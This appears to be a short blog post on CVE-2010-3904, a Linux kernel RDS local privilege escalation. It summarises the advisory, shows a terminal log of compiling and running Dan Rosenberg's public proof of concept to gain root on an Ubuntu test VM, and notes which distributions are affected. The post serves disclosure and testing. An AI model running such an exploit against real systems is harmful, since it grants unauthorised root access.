Privilege escalation in the Linux kernel
H security has informed about the second privilege escalation in Linux this week (the first is an error in the ld linker) with CVE-2010-3904 .
They point to the advisory as well as the PoC.
On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.
I have tested it in an old Ubuntu 10.10 RC vmware image and it worked.
Ubuntu’s advisory published on October 19th.
msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09d6a40
[+] Resolved rds_ioctl to 0xe09d0000
[+] Resolved commit_creds to 0xc016c340
[+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
I have checked the advisory published by RedHat and seems that RHEL is not affected, ( RHEL 3 and 4 for sure) or I did not manage to make it work.
Debian seems to have a vulnerable kernel only in unstable (squeeze) and sid. The advisory marks all the versions as vulnerable but it should be false because stable and backports does not support RDS.